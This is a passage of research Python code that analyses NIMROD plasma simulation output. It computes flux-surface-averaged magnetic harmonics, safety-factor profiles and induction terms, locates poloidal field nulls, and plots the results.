interpolate_psi(self):\n rhomin=np.min(self.dvar_dict['rhon'])\n rhomax=np.max(self.dvar_dict['rhon'])\n print(self.dvar_dict['rhon'].shape,self.raw_bcmn.shape)\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n self.psin=interp1d(self.dvar_dict['rhon'],self.dvar_dict['psin'],kind='cubic')(self.rhon)\n self.psi =interp1d(self.dvar_dict['rhon'],self.dvar_dict['psi'] ,kind='cubic')(self.rhon)\n self.vprime=np.pi*2*interp1d(self.dvar_dict['rhon'],self.dvar_dict['vprime'],kind='cubic')(self.rhon)\n self.q=interp1d(self.dvar_dict['rhon'],self.dvar_dict['q'], kind='cubic')(self.rhon)\n self.bcmn=interp1d(self.dvar_dict['rhon'],self.raw_bcmn, kind='cubic')(self.rhon)\n self.bsmn=interp1d(self.dvar_dict['rhon'],self.raw_bsmn, kind='cubic')(self.rhon)\n self.bmn_amp =interp1d(self.dvar_dict['rhon'],self.raw_bmn_amp , kind='cubic')(self.rhon)\n self.bmn_phase =interp1d(self.dvar_dict['rhon'],self.raw_bmn_phase , kind='linear')(self.rhon)\n\n\n def set_3dgrid(self,rmin,rmax,zmin,zmax,nr,nz,lphi,nonlin_order=2,debug=0):\n '''sets up a 3d grid, using non to determine the number of phi planes\n based on\n '''\n self.nmodes=self.calc_nmodes(lphi)\n self.nmax=self.nmodes-1\n nphi=nonlin_order*self.nmodes\n phimax=np.pi*2*(nphi-1)/nphi\n p1 = np.array([rmin, zmin, 0.0])\n p2 = np.array([rmax, zmin, 0.0])\n p3 = np.array([rmin, zmax, 0.0])\n p4 = np.array([rmin, zmin, phimax])\n rzp3d = pn.PlotNimrod.grid_3d_gen(p1, p2, p3, p4, nr, nz,nphi)\n self.fields.grid=eval.EvalGrid(rzp3d)\n self.fields.grid.set_debug(debug)\n self.fields.grid.set_3d_symm()\n\n def set_2dgrid(self,start,stop,npts,lphi,nonlin_order=2,debug=0):\n '''sets up a 3d grid, using non to determine the number of phi planes\n based on\n '''\n self.nmodes=self.calc_nmodes(lphi)\n self.nmax=self.nmodes-1\n nphi=nonlin_order*self.nmodes\n phimax=np.pi*2*(nphi-1)/nphi\n p1 = np.array([start[0], start[1], 0.0])\n p2 = np.array([stop[0], stop[1], 0.0])\n p3 = np.array([start[0], start[1], phimax])\n rzp2d = pn.PlotNimrod.grid_2d_gen(p1, p2, p3, npts,nphi)\n self.fields.grid=eval.EvalGrid(rzp2d)\n self.fields.grid.set_debug(debug)\n\n def set_fsagrid(self,r,z,lphi,nonlin_order):\n self.nmodes=self.calc_nmodes(lphi)\n self.nmax=self.nmodes-1\n nphi=nonlin_order*self.nmodes\n phimax=np.pi*2*(nphi-1)/nphi\n rzp=np.zeros([3,nphi])\n rzp[0,:]=r\n rzp[1,:]=z\n rzp[2,:]=np.linspace(0,phimax,nphi)\n return rzp\n\n def analyze(self):\n rmin=0.8\n rmax=2.5\n zmin=-1.5\n zmax=1.5\n npts=300\n lphi=5\n nonlin_order=2\n\n self.set_3dgrid(rmin,rmax,zmin,zmax,npts,npts,lphi,nonlin_order)\n #self.set_fsagrid(1,1,lphi,nonlin_order)\n self.fields.induction()\n divpie_fft=self.fields.fft(self.fields.edict['divpie'])\n figsize=[6,6]\n fig, ax = plt.subplots(figsize=figsize)\n ax.set_aspect('equal')\n ax.set(title=r\"$|E_\\pi|_R$\")\n pn.PlotNimrod.plot_scalar_plane(self.fields.grid.rzp[:,:,:,0], np.abs(divpie_fft[0,:,:,1]),ax=ax)\n\n\n fig, ax = plt.subplots(figsize=figsize)\n ax.set_aspect('equal')\n ax.set(title=r\"$|E_\\pi|_Z$\")\n pn.PlotNimrod.plot_scalar_plane(self.fields.grid.rzp[:,:,:,0], np.abs(divpie_fft[1,:,:,1]),ax=ax)\n # self.continuity()\n # self.momentum()\n # self.temperature()\n # self.induction()\n\n def find_comp_boundary(self,inpoint,outpoint,tol=1e-8):\n index=0\n maxit=100\n ntest=self.fields.eval.eval_field('n',outpoint,dmode=0,eq=1)\n if ntest ==ntest:\n '''return if outpoint is in domain'''\n return outpoint\n fst=np.copy(inpoint)\n lst=np.copy(outpoint)\n print(fst,inpoint)\n print(lst,outpoint)\n dist=np.linalg.norm(lst-fst,2)\n if dist<tol:\n return fst\n while True:\n tst=(fst+lst)/2.0\n print(tst)\n ntest=self.fields.eval.eval_field('n',tst,dmode=0,eq=1)\n if ntest ==ntest:\n fst=tst\n else:\n lst=tst\n dist=np.linalg.norm(lst-fst,2)\n print(dist)\n if dist<tol:\n break\n index+=1\n if index>maxit:\n print(\"no convergence\")\n break\n print(fst)\n print(lst)\n return fst\n\n def plot_line(self,line,field,flabel=None,xvar=None,title='Title',\n xlabel='x', ylabel='y',fig_size = [12,6.75],qlist=None):\n print(np.shape(line))\n if xvar==None:\n xvar = np.sqrt((line[0, :] - line[0, 0]) ** 2 +\n (line[1, :] - line[1, 0]) ** 2 +\n (line[2, :] - line[2, 0]) ** 2)\n\n fig, ax = plt.subplots(figsize=fig_size)\n\n ax.plot(xvar, field, alpha=0.7, label=flabel)\n if qlist is not None:\n for ii in qlist:\n ax.axvline(ii[1],label=ii[0],ls=':')\n ax.legend(loc=1)\n\n ax.set(ylabel=ylabel, xlabel=xlabel,title=title)\n\n\n ax.ticklabel_format(axis='both', style='sci', scilimits=(10**3,10**-3),\n useOffset=None, useLocale=None, useMathText=True)\n\n plt.tight_layout()\n plt.show()\n return\n\n def analyze_radial(self,dir='mid'):\n npts=500\n lphi=5\n nonlin_order=2\n rzo=np.array([1.76821,-0.0188439,0.0])\n oPoint=self.find_pf_null(self.fields.eval, rzo, flag=0)\n rzx=np.array([1.27,-1.14,0.0])\n xPoint=self.find_pf_null(self.fields.eval, rzx, flag=0)\n #find rmax\n rzmax=np.copy(oPoint)\n rzmax[0]=3.0\n rzmax=self.find_comp_boundary(oPoint,rzmax)\n self.set_2dgrid(oPoint,rzmax,npts,lphi,nonlin_order)\n self.fields.induction()\n divpie_fft=self.fields.fft(self.fields.edict['divpie'])\n divpie0_fft=self.fields.fft(self.fields.edict['divpie0'])\n divpie1_fft=self.fields.fft(self.fields.edict['divpie1'])\n divpieb_fft=self.fields.fft(self.fields.edict['divpieb'])\n\n\n\n pn.PlotNimrod.plot_scalar_line(self.fields.grid.rzp[:,:,0], self.fields.fielddict['fsa_beq2'].data[:,0])\n\n\n q=np.empty(npts)\n q[:]=np.NaN\n length=np.sqrt(\n (self.fields.grid.rzp[0,:,0] - self.fields.grid.rzp[0,0,0]) ** 2 +\n (self.fields.grid.rzp[1,:,0] - self.fields.grid.rzp[1,0,0]) ** 2 +\n (self.fields.grid.rzp[2,:,0] - self.fields.grid.rzp[2,0,0]) ** 2)\n for ii in range(npts):\n yvar, contours = fsa.FSA(self.fields.eval, self.fields.grid.rzp[:,ii,0], self.q_fsa, neq=1, \\\n nsurf=1,flag=1,normalize=False,rzp=self.fields.grid.rzp[:,ii,0])\n if yvar!=yvar:\n break\n q[ii]=yvar/(np.pi*2.0)\n\n iend=npts-1\n while np.isnan(q[iend]):\n iend -= 1\n lenofq=interp1d(q[:iend], length[:iend], kind='cubic',fill_value=\"extrapolate\")\n qlist=[]\n qlist.append(('q=-2',lenofq(-2)))\n qlist.append(('q=-3',lenofq(-3)))\n qlist.append(('q=-4',lenofq(-4)))\n\n self.plot_line(self.fields.grid.rzp[:,:,0], np.abs(divpie_fft[0,:,1]),\n title=\"Radial n=1 neoclassical E\",xlabel=\"Distance from o-point\", ylabel=r\"$|E_\\Pi|_R$\",\n qlist=qlist)\n\n self.plot_line(self.fields.grid.rzp[:,:,0], np.abs(divpie_fft[1,:,1]),\n title=\"Radial n=1 neoclassical E\",xlabel=\"Distance from o-point\", ylabel=r\"$|E_\\Pi|_Z$\",\n qlist=qlist)\n\n self.plot_line(self.fields.grid.rzp[:,:,0], np.abs(divpie0_fft[1,:,0]),\n title=\"Vertical n=1 E factor\",xlabel=\"Distance from o-point\", ylabel=r\"$|F_E|_Z$\",\n qlist=qlist)\n\n self.plot_line(self.fields.grid.rzp[:,:,0], np.abs(divpie1_fft[1,:,0]),\n title=\"Vertical n=1 neoclassical stress\",xlabel=\"Distance from o-point [m]\", ylabel=r\"$ |\\Pi_e|_Z$\",\n qlist=qlist)\n\n self.plot_line(self.fields.grid.rzp[:,:,0], np.abs(divpieb_fft[1,:,0]),\n title=\"Vertical n=1 neoclassical factor\",xlabel=\"Distance from o-point\", ylabel=r\"$|Fl_\\Pi|_Z$\",\n qlist=qlist)\n\n @staticmethod\n def calc_nmodes(lphi):\n nmodes=int(2**lphi/3)+1\n return nmodes\n\n def get_m_index(self,m):\n '''Return the index for the given m\n Return None if m is out of range'''\n if self.mmax==None:\n write(\"mmax has not be set in get_m_index\")\n raise\n else:\n if m>self.mmax:\n return None\n elif m<-1*self.mmax:\n return None\n else:\n return m+self.mmax\n\n def dummy_fsa(self,rzc,y,dy,evalnimrod,fargs):\n '''\n Dummy integrand for complex fsa, this is used to get v' and q\n without running a true fsa\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth :v'\n dy(3)=dq: q\n '''\n dy[4]=1.0\n return dy\n\n def q_fsa(self,rzc,y,dy,evalnimrod,fargs):\n '''\n Simple integrand for this is used to get q when running with 1 rzp\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth :v'\n dy(3)=dq: q\n '''\n dy[4]=dy[3]\n return dy\n\n def surfmn_int(self,rzc,y,dy,evalnimrod,fargs):\n '''\n Integrand for fluxsurface integration\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth\n dy(3)=dq\n dy(4)=dtheta\n '''\n addpert=fdict.get(\"addpert\",True)\n #self.mmax=fargs.get(\"mmax\")\n b0=np.array(fsa.get_b0(evalnimrod,rzc,addpert))\n b = evalnimrod.eval_field('b', rzc, dmode=0)\n rr =rzc[0]\n q=self.qpsi(fargs.get('psi'))\n jac=rr*q/b0[2]\n dy[4]=dy[2]/jac #dtheta\n for ii, im in enumerate(self.ifour):\n oset = ii * (4*self.mmax+1)\n reb=np.real(b[:,im+1])\n imb=np.imag(b[:,im+1])\n rBePsi=rr*(reb[1]*b0[0]-reb[0]*b0[1])\n iBePsi=rr*(imb[1]*b0[0]-imb[0]*b0[1])\n for im in range(self.mmax):\n nmth=-(self.mmax-im)*y[4] #negative m theta\n pmth=(im+1)*y[4] #positive m theta\n dy[5+im+oset]=(rBePsi*np.cos(nmth)-iBePsi*np.sin(nmth))*dy[2]\n dy[6+self.mmax+im+oset]=(rBePsi*np.cos(pmth)-iBePsi*np.sin(pmth))*dy[2]\n dy[6+2*self.mmax+im+oset]=-(rBePsi*np.sin(nmth)+iBePsi*np.cos(nmth))*dy[2]\n dy[6+3*self.mmax+im+oset]=-(rBePsi*np.sin(pmth)+iBePsi*np.cos(pmth))*dy[2]\n dy[5+self.mmax+oset]=rBePsi*dy[2]\n return dy\n\n @timer.timer_func\n def induction_int(self,rzc,y,dy,evalnimrod,fargs):\n ifour=fargs.get(\"ifour\")\n mmax=fargs['mmax']\n nfour=len(fargs['ifour'])\n addpert=fargs.get(\"addpert\",True)\n lphi=5\n nonlin_order=2\n grid=self.set_fsagrid(rzc[0],rzc[1],lphi,nonlin_order)\n self.fields.fielddict={}\n self.fields.ndict={}\n self.fields.edict={}\n self.fields.eval_b(grid=grid,fft=True)\n self.fields.induction(grid=grid)\n if addpert:\n b0=self.fields.fielddict['b0'].data[:,0]\n else:\n b0=self.fields.fielddict['beq'].data[:,0]\n rr =rzc[0]\n #print(fargs.get('psi'))\n q=self.qpsi(fargs.get('psi'))\n jac=rr*q/b0[2]\n dy[4]=dy[2]/jac\n nfour=ifour[0]\n #get br first\n ii=0\n # for ii, im in enumerate(ifour):\n oset = ii * (4*mmax+1)\n #todo test\n# reb=np.real(self.fields.fielddict['bpert'].data[:,nfour])\n# imb=np.imag(self.fields.fielddict['bpert'].data[:,nfour])\n reb=np.real(self.fields.fielddict['bfour'][:,nfour])\n imb=np.imag(self.fields.fielddict['bfour'][:,nfour])\n\n rBePsi=rr*(reb[1]*b0[0]-reb[0]*b0[1])\n iBePsi=rr*(imb[1]*b0[0]-imb[0]*b0[1])\n for im in range(mmax):\n nmth=-(mmax-im)*y[4] #negative m theta\n pmth=(im+1)*y[4] #positive m theta\n dy[5+im+oset]=(rBePsi*np.cos(nmth)-iBePsi*np.sin(nmth))*dy[2]\n dy[6+mmax+im+oset]=(rBePsi*np.cos(pmth)-iBePsi*np.sin(pmth))*dy[2]\n dy[6+2*mmax+im+oset]=-(rBePsi*np.sin(nmth)+iBePsi*np.cos(nmth))*dy[2]\n dy[6+3*mmax+im+oset]=-(rBePsi*np.sin(pmth)+iBePsi*np.cos(pmth))*dy[2]\n dy[5+mmax+oset]=rBePsi*dy[2]\n #print(self.fields.dbdtdict.keys())\n for ii, ikey in enumerate(self.fields.dbdtdict):\n oset = (ii+1) * (4*mmax+1)\n thisFi=self.fields.fft(self.fields.dbdtdict[ikey])[:,nfour]\n reFi=np.real(thisFi)\n imFi=np.imag(thisFi)\n # print(ikey,reFi,imFi)\n rFiPsi=rr*(reFi[1]*b0[0]-reFi[0]*b0[1])\n iFiPsi=rr*(imFi[1]*b0[0]-imFi[0]*b0[1])\n # print(rFiPsi,iFiPsi)\n for im in range(mmax):\n nmth=-(mmax-im)*y[4] #negative m theta\n pmth=(im+1)*y[4] #positive m theta\n dy[5+im+oset]=(rFiPsi*np.cos(nmth)-iFiPsi*np.sin(nmth))*dy[2]\n dy[6+mmax+im+oset]=(rFiPsi*np.cos(pmth)-iFiPsi*np.sin(pmth))*dy[2]\n dy[6+2*mmax+im+oset]=-(rFiPsi*np.sin(nmth)+iFiPsi*np.cos(nmth))*dy[2]\n dy[6+3*mmax+im+oset]=-(rFiPsi*np.sin(pmth)+iFiPsi*np.cos(pmth))*dy[2]\n dy[5+mmax+oset]=rFiPsi*dy[2]\n return dy\n\n @timer.timer_func\n def psi_int(self,rzc,y,dy,evalnimrod,fargs):\n ifour=fargs.get(\"ifour\")\n mmax=fargs['mmax']\n nfour=len(fargs['ifour'])\n addpert=fargs.get(\"addpert\",True)\n lphi=5\n nonlin_order=2\n grid=self.set_fsagrid(rzc[0],rzc[1],lphi,nonlin_order)\n self.fields.fielddict={}\n self.fields.ndict={}\n self.fields.edict={}\n self.fields.eval_b(grid=grid,fft=True)\n if addpert:\n b0=self.fields.fielddict['b0'].data[:,0]\n else:\n b0=self.fields.fielddict['beq'].data[:,0]\n rr =rzc[0]\n #print(fargs.get('psi'))\n q=self.qpsi(fargs.get('psi'))\n jac=rr*q/b0[2]\n dy[4]=dy[2]/jac\n nfour=ifour[0]\n\n ii=0\n # for ii, im in enumerate(ifour):\n oset = ii * (4*mmax+1)\n #print(self.fields.fielddict['bfour'])\n #print(self.fields.fielddict['bfour'].shape)\n reb=np.real(self.fields.fielddict['bfour'][:,nfour])\n #print(self.fields.fielddict['bfour'].data[:,:])\n imb=np.imag(self.fields.fielddict['bfour'][:,nfour])\n rBePsi=rr*(reb[1]*b0[0]-reb[0]*b0[1])\n iBePsi=rr*(imb[1]*b0[0]-imb[0]*b0[1])\n for im in range(mmax):\n nmth=-(mmax-im)*y[4] #negative m theta\n pmth=(im+1)*y[4] #positive m theta\n dy[5+im+oset]=(rBePsi*np.cos(nmth)-iBePsi*np.sin(nmth))*dy[2]\n dy[6+mmax+im+oset]=(rBePsi*np.cos(pmth)-iBePsi*np.sin(pmth))*dy[2]\n dy[6+2*mmax+im+oset]=-(rBePsi*np.sin(nmth)+iBePsi*np.cos(nmth))*dy[2]\n dy[6+3*mmax+im+oset]=-(rBePsi*np.sin(pmth)+iBePsi*np.cos(pmth))*dy[2]\n dy[5+mmax+oset]=rBePsi*dy[2]\n return dy\n\n def get_rho_q(self,q):\n try:\n return interp1d(self.q,self.rhon, kind='cubic',fill_value=\"extrapolate\")(q)\n except:\n print(f\"The safety factor {q} is not it the domain\")\n raise\n\n def get_field_rho(self,field,rhon):\n try:\n return interp1d(self.rhon,field, kind='cubic')(rhon)\n except:\n print(f\"Problem evaluitng field at rhon={rhon}\")\n raise\n\n @timer.timer_func\n def calculate_induction(self,rzo=None,rzx=None,nsurf=150,eqflag=0,fargs={},**kwargs):\n self.fields.set_method(\"induction\")\n ifour=fargs.get(\"ifour\")\n mmax=fargs['mmax']\n nfour=len(fargs['ifour'])\n self.mmax=mmax\n self.ifour=ifour\n self.nfour=nfour\n self.fsa=True\n fargs['rtol']=1.e-8\n #\n dvar, yvar, contours = fsa.FSA(self.fields.eval, rzo, self.dummy_fsa, 1, \\\n nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, \\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n #unevaluated interpoate\n self.qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic',fill_value=\"extrapolate\")\n #call induction at opoint to get number of fields\n self.fields.induction(grid=rzo)\n nterms=len(self.fields.dbdtdict)+1\n #neq 1 for dtheta\n #4*self.mmax+1 for each field per toroidal mode\n #to keep things simple let's assume 1 toroidal mode\n #include 1 term for B itself\n neq =1+nterms*1*(4*mmax+1)\n dvar,yvar,contours = fsa.FSA(self.fields.eval, rzo, self.induction_int, neq, \\\n nsurf=nsurf,depvar='eta', dpow=0.5,rzx=rzx,flag=eqflag,normalize=False,\\\n **fargs)\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n\n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n\n bmn_amp=np.zeros([1,2*mmax+1,iend])\n bmn_phase=np.zeros([1,2*mmax+1,iend])\n bcmn=np.zeros([1,2*mmax+1,iend])\n bsmn=np.zeros([1,2*mmax+1,iend])\n\n ii=0\n oset = ii * (4*mmax+1)\n bcmn[ii,:,:]= yvar[1+oset:2*mmax+2+oset,:iend]*(np.pi*2.0)\n bsmn[ii,0:mmax,:]=\\\n yvar[2+2*mmax+oset:2+3*mmax+oset,:iend]*(np.pi*2.0)\n bsmn[ii,mmax+1:2*mmax+1,:]=\\\n yvar[2+3*mmax+oset:2+4*mmax+oset,:iend]*(np.pi*2.0)\n bmn_amp=np.sqrt(np.square(bcmn)+np.square(bsmn))\n bmn_phase=np.arctan2(bsmn,bcmn)\n this_dict={}\n self.fsa_dict={}\n for ii, ikey in enumerate(self.fields.dbdtdict):\n oset = (ii+1) * (4*mmax+1)\n #oset = (ii+1)\n this_amp=np.zeros([1,2*mmax+1,iend])\n this_phase=np.zeros([1,2*mmax+1,iend])\n this_cmn=np.zeros([1,2*mmax+1,iend])\n this_smn=np.zeros([1,2*mmax+1,iend])\n this_cmn[0,:,:]= yvar[1+oset:2*mmax+2+oset,:iend]*(np.pi*2.0)\n this_smn[0,0:mmax,:]=\\\n yvar[2+2*mmax+oset:2+3*mmax+oset,:iend]*(np.pi*2.0)\n this_smn[0,mmax+1:2*mmax+1,:]=\\\n yvar[2+3*mmax+oset:2+4*mmax+oset,:iend]*(np.pi*2.0)\n print(ikey)\n self.fsa_dict[ikey]=(this_cmn,this_smn)\n\n #dvars\n self.dvar_dict={}\n self.dvar_dict['psin']=dvar[0,:iend]\n self.dvar_dict['rhon']=dvar[1,:iend]\n self.dvar_dict['psi']=dvar[2,:iend]\n self.dvar_dict['vprime']=dvar[6,:iend]\n self.dvar_dict['q']=dvar[7,:iend]\n\n self.raw_bcmn=bcmn\n self.raw_bsmn=bsmn\n self.raw_bmn_amp=bmn_amp\n self.raw_bmn_phase =bmn_phase\n\n self.interpolate_fsa()\n\n # neq=1+nterm*self.nfour*(4*self.mmax+1)\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n conf=plt.plot(self.rhon,self.q)\n plt.show()\n\n fig =plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n conf=plt.plot(self.rhon,self.bmn_amp[0,2,:])\n plt.show()\n\n fig =plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n conf=plt.plot(self.rhon,self.bmn_phase[0,2,:])\n plt.show()\n\n return None\n\n\n @timer.timer_func\n def calculate_psi(self,rzo=None,rzx=None,nsurf=150,eqflag=0,fargs={},**kwargs):\n self.fields.set_method(\"induction\")\n\n ifour=fargs.get(\"ifour\")\n mmax=fargs['mmax']\n nfour=len(fargs['ifour'])\n self.mmax=mmax\n self.ifour=ifour\n self.nfour=nfour\n\n self.fsa=True\n fargs['rtol']=1.e-8\n #\n dvar, yvar, contours = fsa.FSA(self.fields.eval, rzo, self.dummy_fsa, 1, \\\n nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, \\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n #unevaluated interpoate\n self.qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic',fill_value=\"extrapolate\")\n #call induction at opoint to get number of fields\n self.fields.induction(grid=rzo)\n nterms=len(self.fields.dbdtdict)+1\n #neq 1 for dtheta\n #4*self.mmax+1 for each field per toroidal mode\n #to keep things simple let's assume 1 toroidal mode\n #include 1 term for B itself\n neq =1+(4*mmax+1)\n # neq=1+(4*mmax+1)\n dvar,yvar,contours = fsa.FSA(self.fields.eval, rzo, self.psi_int, neq, \\\n nsurf=nsurf,depvar='eta', dpow=0.5,rzx=rzx,flag=eqflag,normalize=False,\\\n **fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n\n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n\n bmn_amp=np.zeros([1,2*mmax+1,iend])\n bmn_phase=np.zeros([1,2*mmax+1,iend])\n bcmn=np.zeros([1,2*mmax+1,iend])\n bsmn=np.zeros([1,2*mmax+1,iend])\n\n ii=0\n oset = ii * (4*mmax+1)\n bcmn[ii,:,:]= yvar[1+oset:2*mmax+2+oset,:iend]*(np.pi*2.0)\n bsmn[ii,0:mmax,:]=\\\n yvar[2+2*mmax+oset:2+3*mmax+oset,:iend]*(np.pi*2.0)\n bsmn[ii,mmax+1:2*mmax+1,:]=\\\n yvar[2+3*mmax+oset:2+4*mmax+oset,:iend]*(np.pi*2.0)\n bmn_amp=np.sqrt(np.power(bcmn,2)+np.power(bsmn,2))\n bmn_phase=np.arctan2(bsmn,bcmn)\n\n #dvars\n self.dvar_dict={}\n self.dvar_dict['psin']=dvar[0,:iend]\n self.dvar_dict['rhon']=dvar[1,:iend]\n self.dvar_dict['psi']=dvar[2,:iend]\n self.dvar_dict['vprime']=dvar[6,:iend]\n self.dvar_dict['q']=dvar[7,:iend]\n\n self.raw_bcmn=bcmn\n self.raw_bsmn=bsmn\n self.raw_bmn_amp=bmn_amp\n self.raw_bmn_phase =bmn_phase\n\n self.interpolate_psi()\n\n # neq=1+nterm*self.nfour*(4*self.mmax+1)\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n conf=plt.plot(self.rhon,self.q)\n plt.show()\n\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n conf=plt.plot(dvar[1,:iend],bmn_amp[0,3,:])\n plt.show()\n\n fig =plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n for im in range(self.bmn_amp.shape[1]):\n conf=plt.plot(self.rhon,self.bmn_amp[0,im,:],label=f\"index={im}\")\n plt.legend()\n plt.show()\n\n fig =plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n for im in range(self.bmn_amp.shape[1]):\n conf=plt.plot(self.rhon,self.bcmn[0,im,:],label=f\"cos index={im}\")\n plt.legend()\n plt.show()\n\n fig =plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n conf=plt.plot(self.rhon,self.bmn_amp[0,3,:],label=f\"index={3}\")\n conf=plt.plot(self.rhon,self.bmn_amp[0,7,:],label=f\"index={7}\")\n plt.legend()\n plt.show()\n\n\n return None\n\n def calculate(self,rzo=None,rzx=None,nsurf=150,eqflag=0,fargs={},**kwargs):\n mi=kwargs.get(\"mi\",3.3435860e-27)\n qe=kwargs.get(\"qe\",1.609e-19)\n self.ifour=fargs.get(\"ifour\")\n self.mmax=fargs['mmax']\n self.nfour=len(fargs['ifour'])\n self.setprofiles=True\n\n #first call to fsa is to calcualte q\n evalnimrod=eval.EvalNimrod(self.dumpfile,fieldlist='nvptbj')\n dvar, yvar, contours = fsa.FSA(evalnimrod, rzo, self.dummy_fsa, 1, \\\n nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, \\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n #unevaluated interpoate\n self.qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic')\n\n #second call to fsa is to calcualte b_ms ans psi_mn\n neq=1+self.nfour*(4*self.mmax+1)\n dvar,yvar,contours = fsa.FSA(evalnimrod, rzo, self.surfmn_int, neq, \\\n nsurf=nsurf,depvar='eta', dpow=0.5,rzx=rzx,flag=eqflag,normalize=False,\\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n\n bmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n bcmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n bsmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n for ii in range(self.nfour):\n oset = ii * (4*self.mmax+1)\n bcmn[ii,:,:]= yvar[1+oset:2*self.mmax+2+oset,:iend]*(np.pi*2.0)\n bsmn[ii,0:self.mmax,:]=\\\n yvar[2+2*self.mmax+oset:2+3*self.mmax+oset,:iend]*(np.pi*2.0)\n bsmn[ii,self.mmax+1:2*self.mmax+1,:]=\\\n yvar[2+3*self.mmax+oset:2+4*self.mmax+oset,:iend]*(np.pi*2.0)\n bmn=np.sqrt(np.square(bcmn)+np.square(bsmn))\n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n #dvars\n self.psin=interp1d(dvar[1,:iend], dvar[0,:iend], kind='cubic')(self.rhon)\n self.psi=interp1d(dvar[1,:iend], dvar[2,:iend], kind='cubic')(self.rhon)\n self.vprime=np.pi*2*interp1d(dvar[1,:iend], dvar[6,:iend], kind='cubic')(self.rhon)\n self.q=interp1d(dvar[1,:iend], dvar[7,:iend], kind='cubic')(self.rhon)\n\n self.bcmn=interp1d(dvar[1,:iend],bcmn, kind='cubic')(self.rhon)\n self.bsmn=interp1d(dvar[1,:iend],bsmn, kind='cubic')(self.rhon)\n self.bmn =interp1d(dvar[1,:iend],bmn , kind='cubic')(self.rhon)\n\n def get_b0(self,eval_nimrod,rzn,flag,abort=False):\n \"\"\"\n Find b at a given point\n :param eval_nimrod: eval_nimrod class instance\n :param rzn: initial guess for poloidal field null\n :param flag: if 0 only use eq, if 1 add n=0 to eq\n :param abort: raise an exception if true and can't find b\n \"\"\"\n b = eval_nimrod.eval_field('b', rzn, dmode=0)\n b0=np.real(b[:])\n if (abort and np.isnan(b0).any()):\n print(b)\n raise Exception('FSA_find_pf_null: Hit wall')\n return b0\n\n def find_pf_null(self,eval_nimrod, rzn, flag=0):\n \"\"\"\n Find a poloidal field null\n :param eval_nimrod: eval_nimrod class instance\n :param rzn: initial guess for poloidal field null\n :param flag: if 0 only use eq, if 1 add n=0 to eq\n \"\"\"\n rzn = np.array(rzn)\n maxsteps=1000\n it=0\n rtol=1.e-8\n drz0=0.125*rzn[0]\n while True:\n b = self.get_b0(eval_nimrod,rzn,flag,abort=False)\n norm0=np.sqrt(b[0]**2+b[1]**2)\n rvn=-rzn[0]*b[1]/norm0\n zvn= rzn[0]*b[0]/norm0\n drz=drz0*(1.0-float(it)/maxsteps)+rtol*rzn[0]\n while True:\n rr=rzn[0]+rvn*drz\n zz=rzn[1]+zvn*drz\n rzng=np.array([rr, zz, 0.0])\n b = self.get_b0(eval_nimrod,rzng,flag,abort=False)\n if not np.isnan(b).any():\n norm=np.sqrt(b[0]**2+b[1]**2)\n if (norm < norm0):\n rzn[:]=rzng[:]\n break\n rr=rzn[0]-rvn*drz\n zz=rzn[1]-zvn*drz\n rzng=np.array([rr, zz, 0.0])\n b = self.get_b0(eval_nimrod,rzng,flag,abort=False)\n if not np.isnan(b).any():\n norm=np.sqrt(b[0]**2+b[1]**2)\n if (norm < norm0):\n rzn[:]=rzng[:]\n break\n drz=drz/2.0\n if (drz/rzn[0] < rtol):\n return rzn # done\n it=it+1\n if it>=maxsteps:\n raise Exception('FSA find_pf_null: No convergence')\n return None\n\n def plot(self,pargs={}):\n for im,imode in enumerate(self.ifour):\n self.plot_radial(im,imode,pargs)\n self.plot_surfmn(im,imode,pargs)\n\n def plot_radial(self,ii,imode,pargs={}):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n title=f\"$\\psi$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n ylabel=f\"$\\psi_m$ [mWb]\"\n colorlist = list(mcolors.TABLEAU_COLORS)\n xlabel=r'$\\rho_N$'\n 